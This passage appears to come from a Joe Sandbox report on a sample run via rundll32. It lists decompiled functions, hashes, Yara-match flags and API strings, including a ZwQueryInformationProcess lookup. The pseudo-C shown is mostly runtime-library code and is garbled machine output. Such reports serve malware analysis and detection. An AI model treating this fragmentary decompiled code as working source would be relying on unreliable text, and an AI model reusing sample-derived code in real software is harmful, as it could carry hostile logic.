                • API String ID: 3215553584-3982473090
                • Opcode ID: f52ae4847fa9419645cbaf3967d967969e9c3a329a324c659f092c552a6c69fe
                • Instruction ID: 3cc46e6eb7cf7bf38cc1868b315ff5948a8a36bf956c0abfd574b66a6930dc21
                • Opcode Fuzzy Hash: f52ae4847fa9419645cbaf3967d967969e9c3a329a324c659f092c552a6c69fe
                • Instruction Fuzzy Hash: AE614E73606E70C6F7689E28805D3EC3BB9EBA6B48F141199DF460229DC738C445CB45
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205C9AE0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: ZwQueryInformationProcess$ntdll.dll
                • API String ID: 1646373207-132032222
                • Opcode ID: d655376752550ca0c6d4ae3c3a63118fda60ee9f0094e96fdfb3eba170af42ae
                • Instruction ID: 10d08677f1904a7a4d95a20fab55a3b22130daf705ae28c9ffddeb61372d3b71
                • Opcode Fuzzy Hash: d655376752550ca0c6d4ae3c3a63118fda60ee9f0094e96fdfb3eba170af42ae
                • Instruction Fuzzy Hash: 8B516833316B60C2EE25CB19E4587D977A0FFE8B84F4440699E4D47B98DF78DA058780
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060FE44 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 30%
                			E000002152152060FE44(void* __edx, void* __esp, void* __eflags, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8) {
				int _t35;
				int _t38;
				signed long long _t76;
				signed long long _t78;
				intOrPtr* _t86;
				signed long long _t93;
				signed long long _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t110 = _t109 - 0x60;
				_t108 = _t110 + 0x30;
				 *((long long*)(_t108 + 0x60)) = __rbx;
				 *((long long*)(_t108 + 0x68)) = __rsi;
				 *((long long*)(_t108 + 0x70)) = __rdi;
				_t76 =  *0x2067c720; // 0xca1645d940e
				 *(_t108 + 0x20) = _t76 ^ _t108;
				r13d = __edx;
				r15d = r9d;
				E00000215215205FA5D4(_t76 ^ _t108, __rbx, _t108, __rcx);
				if ( *((intOrPtr*)(_t108 + 0x88)) != 0) goto 0x2060fe97;
				_t78 =  *((intOrPtr*)(_t108 + 8));
				 *(_t108 + 0x90) =  ~( *(_t108 + 0x90));
				r9d = r15d;
				asm("sbb edx, edx");
				 *(_t110 + 0x28) =  *(_t110 + 0x28) & 0x00000000;
				 *(_t110 + 0x20) =  *(_t110 + 0x20) & 0x00000000;
				_t35 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t35 != 0) goto 0x2060fecb;
				goto 0x2060ffbc;
				_t104 = _t35 + _t35;
				_t15 = _t104 + 0x10; // 0x18
				asm("dec eax");
				if ((_t15 & _t78) == 0) goto 0x2060ff55;
				_t18 = _t104 + 0x10; // 0x18
				_t93 = _t18;
				asm("dec eax");
				_t19 = _t104 + 0x10; // 0x18
				if ((_t78 & _t93) - 0x400 > 0) goto 0x2060ff33;
				asm("dec eax");
				_t20 = (_t93 & _t19) + 0xf; // 0x27
				if (_t20 - (_t93 & _t19) > 0) goto 0x2060ff15;
				E00000215215205F5A80();
				_t111 = _t110 - 0xfffffff0;
				_t86 = _t111 + 0x30;
				if (_t86 == 0) goto 0x2060ffa4;
				 *_t86 = 0xcccc;
				goto 0x2060ff4f;
				asm("dec eax");
				E0000021521520603D7C(0xffffffffffffff0, _t93 & _t19 & 0xfffffff0);
				if (0xfffffff0 == 0) goto 0x2060ff57;
				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
				goto 0x2060ff57;
				if (0xfffffff0 == 0) goto 0x2060ffa4;
				E00000215215205F8EF0( *((intOrPtr*)(_t78 + 0xc)), 0, 0, __esp, 0xfffffff0, __rcx, _t35 + _t35, _t35 + _t35);
				r9d = r15d;
				 *((intOrPtr*)(_t111 + 0x28)) = r14d;
				 *((long long*)(_t111 + 0x20)) = 0xfffffff0;
				_t38 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t38 == 0) goto 0x2060ffa4;
				r8d = _t38;
				GetStringTypeW(??, ??, ??, ??);
				goto 0x2060ffa6;
				if (0xfffffff0 == 0) goto 0x2060ffbc;
				if ( *((intOrPtr*)(0xffffffffffffff0)) != 0xdddd) goto 0x2060ffbc;
				E000002152152060A780(0xffffffffffffff0, 0xffffffffffffff0);
				if ( *((char*)(_t108 + 0x18)) == 0) goto 0x2060ffcd;
				 *( *_t108 + 0x3a8) =  *( *_t108 + 0x3a8) & 0xfffffffd;
				return E00000215215205F59D0(r13d,  *(_t108 + 0x20) ^ _t108, 0xfffffff0,  *((intOrPtr*)(_t108 + 0x80)));
			}













                0x2152060fe4e
                0x2152060fe52
                0x2152060fe57
                0x2152060fe5b
                0x2152060fe5f
                0x2152060fe63
                0x2152060fe6d
                0x2152060fe71
                0x2152060fe74
                0x2152060fe81
                0x2152060fe8e
                0x2152060fe90
                0x2152060fe97
                0x2152060fe9d
                0x2152060fea5
                0x2152060fea7
                0x2152060feac
                0x2152060feb7
                0x2152060fec2
                0x2152060fec6
                0x2152060fece
                0x2152060fed1
                0x2152060fed8
                0x2152060fede
                0x2152060fee0
                0x2152060fee0
                0x2152060fee7
                0x2152060fef3
                0x2152060fef7
                0x2152060fefc
                0x2152060ff02
                0x2152060ff09
                0x2152060ff19
                0x2152060ff1e
                0x2152060ff21
                0x2152060ff29
                0x2152060ff2b
                0x2152060ff31
                0x2152060ff36
                0x2152060ff3c
                0x2152060ff47
                0x2152060ff49
                0x2152060ff53
                0x2152060ff5a
                0x2152060ff64
                0x2152060ff69
                0x2152060ff6c
                0x2152060ff74
                0x2152060ff80
                0x2152060ff88
                0x2152060ff91
                0x2152060ff9a
                0x2152060ffa2
                0x2152060ffa9
                0x2152060ffb5
                0x2152060ffb7
                0x2152060ffc0
                0x2152060ffc6
                0x2152060fff4

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$StringType
                • String ID: %02x
                • API String ID: 3586891840-560843007
                • Opcode ID: 13ab8f9af3b798140b8e51c64361ebaa2f6a1554843be369156d75395636cafa
                • Instruction ID: f99b0d5681cd10c3bc0d112ad91c4a70415253450bc29f2c7834e49729a43ec6
                • Opcode Fuzzy Hash: 13ab8f9af3b798140b8e51c64361ebaa2f6a1554843be369156d75395636cafa
                • Instruction Fuzzy Hash: DF418433352B918AEF308F25D8087DA6392FBA5BA8F584565AE5D47BD8DF38E4418300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F4118 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ByteCharErrorFileLastMultiWideWrite
                • String ID: U
                • API String ID: 2456169464-4171548499
                • Opcode ID: 4075517f7857747b7ea44fef219e885793f2915a22ae05a0ce25cc65d5e7b8de
                • Instruction ID: b0f83e618ff7f4f053d1a05c155f389c7799a95f2fe479626a6fe59c853baba3
                • Opcode Fuzzy Hash: 4075517f7857747b7ea44fef219e885793f2915a22ae05a0ce25cc65d5e7b8de
                • Instruction Fuzzy Hash: A241F2A2B28B8186E7209F25E8447AE67A6FBD9780F489031EE4D97788DF3CD010C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520617670 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharErrorFileLastMultiWideWrite
                • String ID: U
                • API String ID: 2456169464-4171548499
                • Opcode ID: f2060908e614403caa3aa922cb5b982ee00030681d8560858e98b455461f9808
                • Instruction ID: f306df2a21e631c9ef55831043c9bb906594af9a0bbb5a4b2f86c80f79ef0c2e
                • Opcode Fuzzy Hash: f2060908e614403caa3aa922cb5b982ee00030681d8560858e98b455461f9808
                • Instruction Fuzzy Hash: 8F419233316E90C6EB208F65E8487EAA7A1FBE8794F944121EE4D87798DB7CD445C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215206040E8 Relevance: 6.4, APIs: 4, Instructions: 425COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E00000215215206040E8(void* __edx, long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, long long _a8, signed int _a16, void* _a24, signed int _a32) {
				long long _v64;
				long long _v72;
				char _v80;
				signed int* _v88;
				void* __rdi;
				void* __rsi;
				void* __r14;
				void* _t88;
				signed int _t96;
				void* _t102;
				signed int _t115;
				signed int _t125;
				void* _t129;
				void* _t150;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t167;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				intOrPtr* _t265;
				intOrPtr* _t269;
				intOrPtr _t270;
				intOrPtr* _t271;
				intOrPtr* _t273;
				signed long long _t274;
				intOrPtr* _t276;
				intOrPtr* _t278;
				intOrPtr* _t282;
				signed long long _t283;
				intOrPtr* _t285;
				intOrPtr* _t287;
				intOrPtr* _t288;
				intOrPtr* _t290;
				signed long long _t291;
				intOrPtr* _t292;
				intOrPtr* _t294;
				intOrPtr* _t296;
				intOrPtr* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed long long* _t302;
				signed long long _t306;
				signed long long _t307;
				char* _t309;
				long long _t313;
				signed long long _t314;
				signed long long _t315;
				void* _t318;
				signed long long _t319;
				char* _t320;
				intOrPtr* _t326;
				void* _t329;
				signed int* _t330;
				signed int* _t331;
				long long _t332;
				signed int* _t333;
				signed int* _t334;
				signed int* _t335;
				intOrPtr* _t337;

				_t313 = __rdx;
				_a8 = __rbx;
				_a24 = __r8;
				_t265 =  *((intOrPtr*)(__rdx));
				_t332 = __r8;
				_t302 = __rdx;
				_t337 = __rcx;
				if (_t265 != 0) goto 0x20604131;
				_t88 = E0000021521520603944(_t265);
				 *_t265 = 0x16;
				E00000215215205FAABC(_t88);
				goto 0x206045b9;
				_v88 = _t265;
				_t172 =  *_t265;
				 *((long long*)(__rdx)) = _t265 + 1;
				_v72 =  &_a16;
				_v64 =  &_v88;
				_v80 = __rdx;
				_a16 =  *_t265;
				if (__rcx == 0) goto 0x20604185;
				_t269 =  *__rcx;
				if ( *((intOrPtr*)(_t269 + 8)) - 1 <= 0) goto 0x20604176;
				_t326 = __rcx;
				E000002152152060BE68(_t172 & 0x000000ff, 8, 0,  *((intOrPtr*)(_t269 + 8)) - 1, __rdx, _t318, _t319, __rcx, _t329, __r8);
				goto 0x20604191;
				_t270 =  *_t269;
				goto 0x20604194;
				E0000021521520607CB0(_t270);
				_t96 =  *(_t270 + _t319 * 2) & 8;
				if (_t96 == 0) goto 0x206041a5;
				_t271 =  *_t302;
				 *_t302 = _t271 + 1;
				goto 0x20604151;
				_t320 = _t332 + 0x308;
				 *_t320 = _t96 & 0xffffff00 |  *_t271 == 0x0000002d;
				if ((_t313 - 0x0000002b & 0x000000fd) != 0) goto 0x206041c9;
				_t273 =  *_t302;
				_t176 =  *_t273;
				_t274 = _t273 + 1;
				 *_t302 = _t274;
				_a16 = _t176;
				r10b = 0xdf;
				if ((r10b & _t313 - 0x00000049) == 0) goto 0x206045a9;
				_t26 = _t313 - 0x4e; // 0x91
				if ((r10b & _t26) == 0) goto 0x20604597;
				r12b = dil;
				if (_t176 != 0x30) goto 0x2060423a;
				_t330 =  *_t302;
				r8b =  *_t330;
				_t306 =  &(_t330[0]);
				 *_t302 = _t306;
				if ((r10b & _t326 - 0x00000058) == 0) goto 0x20604227;
				_t307 = _t306 - 1;
				 *_t302 = _t307;
				if (r8b == 0) goto 0x2060423a;
				if ( *_t307 == r8b) goto 0x2060423a;
				_t102 = E0000021521520603944(_t274);
				 *_t274 = 0x16;
				E00000215215205FAABC(_t102);
				goto 0x2060423a;
				_t178 =  *_t307;
				_a16 = _t178;
				r12b = 1;
				 *_t302 = _t307 + 1;
				_v88 = _t330;
				_t331 = _t332 + 8;
				r10d = 0;
				_t333 = _t331;
				r8b = dil;
				if (_t178 != 0x30) goto 0x20604262;
				r8b = 1;
				_t276 =  *_t302;
				_t179 =  *_t276;
				_a16 = _t179;
				 *_t302 = _t276 + 1;
				if (_t179 == 0x30) goto 0x2060424f;
				r11b = 0x19;
				asm("inc ebp");
				r9d = r9d & 0x00000006;
				r9d = r9d + 9;
				_t39 = _t313 - 0x30; // 0xaf
				if (_t39 - 9 > 0) goto 0x20604284;
				goto 0x206042a7;
				_t40 = _t313 - 0x61; // 0x7e
				if (_t40 - r11b > 0) goto 0x20604294;
				goto 0x206042a7;
				_t41 = _t313 - 0x41; // 0x9e
				if (_t41 - r11b > 0) goto 0x206042a4;
				goto 0x206042a7;
				_t115 = _t179 - 0x00000037 | 0xffffffff;
				if (_t115 - r9d > 0) goto 0x206042cd;
				r8b = 1;
				if (_t333 == _t320) goto 0x206042ba;
				 *_t333 = _t115;
				_t334 =  &(_t333[0]);
				_t278 =  *_t302;
				r10d = r10d + 1;
				_t180 =  *_t278;
				 *_t302 = _t278 + 1;
				_a16 = _t180;
				goto 0x20604275;
				_a32 = r10d;
				if (_t180 !=  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t337 + 0xf8))))))) goto 0x2060436d;
				_t282 =  *_t302;
				_t181 =  *_t282;
				_t283 = _t282 + 1;
				_a16 = _t181;
				 *_t302 = _t283;
				if (_t334 != _t331) goto 0x20604318;
				if (_t181 != 0x30) goto 0x20604318;
				r8b = 1;
				_t182 =  *_t283;
				r10d = r10d - 1;
				_a16 = _t182;
				 *_t302 = _t283 + 1;
				if (_t182 == 0x30) goto 0x20604301;
				_a32 = r10d;
				_t48 = _t313 - 0x30; // 0xaf
				if (_t48 - 9 > 0) goto 0x20604327;
				goto 0x2060434a;
				_t49 = _t313 - 0x61; // 0x7e
				if (_t49 - r11b > 0) goto 0x20604337;
				goto 0x2060434a;
				_t50 = _t313 - 0x41; // 0x9e
				if (_t50 - r11b > 0) goto 0x20604347;
				goto 0x2060434a;
				_t125 = _t182 - 0x00000037 | 0xffffffff;
				if (_t125 - r9d > 0) goto 0x2060436d;
				r8b = 1;
				if (_t334 == _t320) goto 0x2060435d;
				 *_t334 = _t125;
				_t335 =  &(_t334[0]);
				_t285 =  *_t302;
				_t183 =  *_t285;
				 *_t302 = _t285 + 1;
				_a16 = _t183;
				goto 0x20604318;
				if (r8b != 0) goto 0x20604393;
				_t309 =  &_v80;
				if (E0000021521520604910(_t183, _t309) == 0) goto 0x20604127;
				r12b =  ~r12b;
				asm("sbb eax, eax");
				goto 0x206045b9;
				 *_t302 =  *_t302 - 1;
				_t287 =  *_t302;
				if (_t183 == 0) goto 0x206043b4;
				if ( *_t287 == _t183) goto 0x206043b4;
				_t129 = E0000021521520603944(_t287);
				 *_t287 = 0x16;
				E00000215215205FAABC(_t129);
				r11b = 0x19;
				_t288 =  *_t302;
				_v88 = _t288;
				_t161 =  *_t288;
				_t54 = _t288 + 1; // 0x1
				_t314 = _t54;
				_a16 = _t161;
				 *_t302 = _t314;
				if (_t161 == 0x45) goto 0x206043e3;
				if (_t161 == 0x50) goto 0x206043de;
				if (_t161 == 0x65) goto 0x206043e3;
				if (_t161 != 0x70) goto 0x206043e9;
				goto 0x206043e9;
				r15d = 0x1450;
				if ((r12b & 0xffffff00 | r12b == 0x00000000) == 0) goto 0x20604508;
				_t162 =  *_t314;
				_t315 = _t314 + 1;
				_a16 = _t162;
				 *_t302 = _t315;
				r9b = _t162 == 0x2d;
				if ((_t309 - 0x0000002b & 0x000000fd) != 0) goto 0x2060441e;
				_t163 =  *_t315;
				_t62 = _t315 + 1; // 0xa1
				_a16 = _t163;
				 *_t302 = _t62;
				r8b = dil;
				if (_t163 != 0x30) goto 0x2060443c;
				r8b = 1;
				_t290 =  *_t302;
				_t164 =  *_t290;
				_t291 = _t290 + 1;
				_a16 = _t164;
				 *_t302 = _t291;
				if (_t164 == 0x30) goto 0x20604429;
				if (_t309 - 0x30 - 9 > 0) goto 0x2060444b;
				goto 0x2060446e;
				if (_t309 - 0x61 - r11b > 0) goto 0x2060445b;
				goto 0x2060446e;
				if (_t309 - 0x41 - r11b > 0) goto 0x2060446b;
				goto 0x2060446e;
				if ((_t164 - 0x00000037 | 0xffffffff) - 0xa >= 0) goto 0x20604496;
				r8b = 1;
				if (_t315 + _t291 * 2 - r15d > 0) goto 0x20604491;
				_t292 =  *_t302;
				_t165 =  *_t292;
				 *_t302 = _t292 + 1;
				_a16 = _t165;
				goto 0x2060443c;
				if (_t309 - 0x30 - 9 > 0) goto 0x206044a5;
				goto 0x206044c8;
				if (_t309 - 0x61 - r11b > 0) goto 0x206044b5;
				goto 0x206044c8;
				if (_t309 - 0x41 - r11b > 0) goto 0x206044c5;
				goto 0x206044c8;
				if ((_t165 - 0x00000037 | 0xffffffff) - 0xa >= 0) goto 0x206044dd;
				_t294 =  *_t302;
				 *_t302 = _t294 + 1;
				_a16 =  *_t294;
				goto 0x20604496;
				if (r9b == 0) goto 0x206044e4;
				if (r8b != 0) goto 0x20604508;
				if (E0000021521520604910(_t164 - 0x00000037 | 0xffffffff,  &_v80) == 0) goto 0x20604127;
				_t296 =  *_t302;
				_t167 =  *_t296;
				 *_t302 = _t296 + 1;
				_a16 = _t167;
				 *_t302 =  *_t302 - 1;
				_t298 =  *_t302;
				if (_t167 == 0) goto 0x20604526;
				if ( *_t298 == _t167) goto 0x20604526;
				_t150 = E0000021521520603944(_t298);
				 *_t298 = 0x16;
				E00000215215205FAABC(_t150);
				if (_t335 == _t331) goto 0x20604590;
				_t299 = _t335 - 1;
				if ( *_t299 != dil) goto 0x2060453c;
				if (_t299 != _t331) goto 0x2060452b;
				if (_t299 == _t331) goto 0x20604590;
				if (0x1451 - r15d <= 0) goto 0x2060454d;
				goto 0x206045b9;
				if (0x1451 - 0xffffebb0 >= 0) goto 0x2060455d;
				goto 0x206045b9;
				asm("sbb ecx, ecx");
				if (0x1451 - r15d > 0) goto 0x20604546;
				if (0x1451 - 0xffffebb0 < 0) goto 0x20604556;
				_t300 = _a24;
				r14d = r14d - r13d;
				dil = r12b != 0;
				 *_t300 =  ~0x1451 + ((_t167 & 0x00000003) + 1) * _a32;
				 *((intOrPtr*)(_t300 + 4)) = r14d;
				goto 0x206045b9;
				goto 0x206045b9;
				E00000215215206046EC(_t302,  &_a16, _t302, _v88);
				goto 0x206045b9;
				return E00000215215206045D4(_t302,  &_a16, _t302, _t320, _v88);
			}






































































                0x215206040e8
                0x215206040e8
                0x215206040ed
                0x21520604104
                0x21520604109
                0x2152060410c
                0x2152060410f
                0x21520604115
                0x21520604117
                0x2152060411c
                0x21520604122
                0x2152060412c
                0x21520604131
                0x21520604135
                0x2152060413a
                0x21520604141
                0x21520604149
                0x2152060414d
                0x21520604151
                0x2152060415a
                0x2152060415c
                0x21520604163
                0x21520604165
                0x2152060416f
                0x21520604174
                0x21520604176
                0x21520604183
                0x21520604185
                0x2152060418e
                0x21520604196
                0x21520604198
                0x215206041a0
                0x215206041a3
                0x215206041a8
                0x215206041b2
                0x215206041b9
                0x215206041bb
                0x215206041be
                0x215206041c0
                0x215206041c3
                0x215206041c6
                0x215206041cc
                0x215206041d2
                0x215206041d8
                0x215206041de
                0x215206041e4
                0x215206041ea
                0x215206041ec
                0x215206041ef
                0x215206041f2
                0x215206041f6
                0x21520604200
                0x21520604202
                0x21520604205
                0x2152060420b
                0x21520604210
                0x21520604212
                0x21520604217
                0x2152060421d
                0x21520604225
                0x21520604227
                0x2152060422d
                0x21520604230
                0x21520604233
                0x21520604236
                0x2152060423a
                0x2152060423e
                0x21520604241
                0x21520604244
                0x2152060424a
                0x2152060424c
                0x2152060424f
                0x21520604252
                0x21520604257
                0x2152060425a
                0x21520604260
                0x21520604265
                0x2152060426a
                0x2152060426d
                0x21520604271
                0x21520604275
                0x2152060427a
                0x21520604282
                0x21520604284
                0x2152060428a
                0x21520604292
                0x21520604294
                0x2152060429a
                0x215206042a2
                0x215206042a4
                0x215206042aa
                0x215206042ac
                0x215206042b2
                0x215206042b4
                0x215206042b7
                0x215206042ba
                0x215206042bd
                0x215206042c0
                0x215206042c5
                0x215206042c8
                0x215206042cb
                0x215206042d0
                0x215206042e0
                0x215206042e6
                0x215206042e9
                0x215206042eb
                0x215206042ee
                0x215206042f1
                0x215206042f7
                0x215206042fc
                0x215206042fe
                0x21520604301
                0x21520604303
                0x21520604309
                0x2152060430c
                0x21520604312
                0x21520604314
                0x21520604318
                0x2152060431d
                0x21520604325
                0x21520604327
                0x2152060432d
                0x21520604335
                0x21520604337
                0x2152060433d
                0x21520604345
                0x21520604347
                0x2152060434d
                0x2152060434f
                0x21520604355
                0x21520604357
                0x2152060435a
                0x2152060435d
                0x21520604360
                0x21520604365
                0x21520604368
                0x2152060436b
                0x21520604370
                0x21520604372
                0x2152060437d
                0x21520604383
                0x21520604386
                0x2152060438e
                0x21520604393
                0x21520604396
                0x2152060439b
                0x2152060439f
                0x215206043a1
                0x215206043a6
                0x215206043ac
                0x215206043b1
                0x215206043b4
                0x215206043b7
                0x215206043bb
                0x215206043bd
                0x215206043bd
                0x215206043c1
                0x215206043c7
                0x215206043cd
                0x215206043d2
                0x215206043d7
                0x215206043dc
                0x215206043e1
                0x215206043eb
                0x215206043f3
                0x215206043f9
                0x215206043fb
                0x21520604401
                0x21520604404
                0x21520604407
                0x21520604410
                0x21520604412
                0x21520604414
                0x21520604418
                0x2152060441b
                0x2152060441e
                0x21520604424
                0x21520604426
                0x21520604429
                0x2152060442c
                0x2152060442e
                0x21520604431
                0x21520604434
                0x2152060443a
                0x21520604441
                0x21520604449
                0x21520604451
                0x21520604459
                0x21520604461
                0x21520604469
                0x21520604471
                0x21520604476
                0x2152060447f
                0x21520604481
                0x21520604484
                0x21520604489
                0x2152060448c
                0x2152060448f
                0x2152060449b
                0x215206044a3
                0x215206044ab
                0x215206044b3
                0x215206044bb
                0x215206044c3
                0x215206044cb
                0x215206044cd
                0x215206044d5
                0x215206044d8
                0x215206044db
                0x215206044e0
                0x215206044e7
                0x215206044f4
                0x215206044fa
                0x215206044fd
                0x21520604502
                0x21520604505
                0x21520604508
                0x2152060450b
                0x21520604510
                0x21520604514
                0x21520604516
                0x2152060451b
                0x21520604521
                0x21520604529
                0x2152060452b
                0x21520604532
                0x2152060453a
                0x2152060453f
                0x21520604544
                0x2152060454b
                0x21520604554
                0x2152060455b
                0x21520604562
                0x21520604572
                0x21520604576
                0x21520604578
                0x2152060457c
                0x21520604582
                0x21520604586
                0x21520604588
                0x2152060458e
                0x21520604595
                0x215206045a2
                0x215206045a7
                0x215206045d0

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 51b95306e726cbddc1d74205708729bd795067a530f6109319b3ec0ab3a0e4c2
                • Instruction ID: 37e58aa907c7e3a16b5e17e338c1f749b816dec145f5cdc540098cf5a8d1f834
                • Opcode Fuzzy Hash: 51b95306e726cbddc1d74205708729bd795067a530f6109319b3ec0ab3a0e4c2
                • Instruction Fuzzy Hash: 7FF107B3146EA4CAE7358F25C4883EE3BE2FFA1B88F644091DE4943B99D6399449C301
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205B95F0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$EnterLeave$CloseHandle
                • String ID:
                • API String ID: 3705054111-0
                • Opcode ID: e38053a851f4876fe9df03b08bdd8084867996511b354070ca755d3317f7f365
                • Instruction ID: 8d000f2fc016613f4878b9f7de65d46db8f6d8a28d14cf9bbd4b389f02f95363
                • Opcode Fuzzy Hash: e38053a851f4876fe9df03b08bdd8084867996511b354070ca755d3317f7f365
                • Instruction Fuzzy Hash: E031E372202F9086DB54DF26E44465973A4F799FA4B2847159EB903BE8DF38D4A2C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205C85EC Relevance: 6.2, APIs: 4, Instructions: 210COMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E00000215215205C85EC(signed int __ebx, void* __edi, signed int __esi, void* __eflags, intOrPtr* __rcx, intOrPtr* __rdx, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* _t116;
				signed int _t117;
				void* _t137;
				intOrPtr* _t155;
				void* _t187;
				long long _t188;
				intOrPtr* _t199;
				long long* _t209;
				void* _t220;
				long long* _t221;
				void* _t223;
				void* _t225;
				intOrPtr _t226;
				void* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				void* _t234;
				long long _t237;
				void* _t239;
				long long _t240;
				void* _t242;
				intOrPtr* _t243;
				void* _t245;
				intOrPtr* _t246;

				_t138 = __eflags;
				_t117 = __ebx;
				_t239 = _t231;
				 *(_t239 + 0x20) = r9d;
				 *((long long*)(_t239 + 8)) = __rcx;
				_t232 = _t231 - 0x40;
				 *((long long*)(_t239 - 0x58)) = 0xfffffffe;
				_t246 = __rdx;
				_t243 = __rcx;
				r12d = 0;
				 *(_t239 + 0x20) = r12d;
				 *((long long*)(__rcx)) = 0x206401c8;
				_t229 = __rcx + 0x10;
				 *_t229 = 0x20640100;
				 *((long long*)(__rcx + 0x98)) = 0x20640110;
				 *(_t239 + 0x20) = 1;
				 *((long long*)( *((intOrPtr*)( *__rcx + 4)) + __rcx)) = 0x206401c0;
				 *((intOrPtr*)( *((intOrPtr*)( *__rcx + 4)) + __rcx - 4)) =  *((intOrPtr*)( *__rcx + 4)) - 0x18;
				 *((long long*)(__rcx + 8)) = _t240;
				_t155 =  *__rcx;
				_t225 =  *((intOrPtr*)(_t155 + 4)) + __rcx;
				 *((long long*)(_t225 + 0x40)) = _t240;
				 *((long long*)(_t225 + 8)) = _t240;
				 *(_t225 + 0x14) = r12d;
				 *((intOrPtr*)(_t225 + 0x18)) = 0x201;
				 *((long long*)(_t225 + 0x20)) = 6;
				 *((long long*)(_t225 + 0x28)) = _t240;
				 *((long long*)(_t225 + 0x30)) = _t240;
				 *((long long*)(_t225 + 0x38)) = _t240;
				r8d = 0;
				E00000215215205C7C20(0, __eflags, _t225);
				E00000215215205F4DCC(_t155, _t225);
				_t188 = _t155;
				E00000215215205D6CC8(1, _t188, _t225, _t234);
				 *((long long*)(_t188 + 8)) = _t155;
				 *((long long*)(_t225 + 0x40)) = _t188;
				_t221 = _t243 + 0x18;
				 *((long long*)(_t225 + 0x48)) = _t221;
				 *((long long*)(_t225 + 0x50)) = _t240;
				E00000215215205C7D14(_t225, _t232 + 0x28);
				E00000215215205C8328(__edi, _t138, _t155, _t188, _t155);
				_t199 =  *((intOrPtr*)(_t232 + 0x30));
				if (_t199 == 0) goto 0x205c8710;
				 *((intOrPtr*)( *_t199 + 0x10))(_t245, _t242, _t240, _t220, _t223, _t228, _t187);
				if (_t155 == 0) goto 0x205c8710;
				 *((intOrPtr*)( *_t155))();
				 *((char*)(_t225 + 0x58)) =  *((intOrPtr*)( *_t155 + 0x40))();
				if ( *((intOrPtr*)(_t225 + 0x48)) != _t240) goto 0x205c8736;
				r8d = 0;
				E00000215215205C7C20( *(_t225 + 0x10) | 0x00000004,  *((intOrPtr*)(_t225 + 0x48)) - _t240, _t225);
				 *((long long*)(_t232 + 0x88)) = _t229;
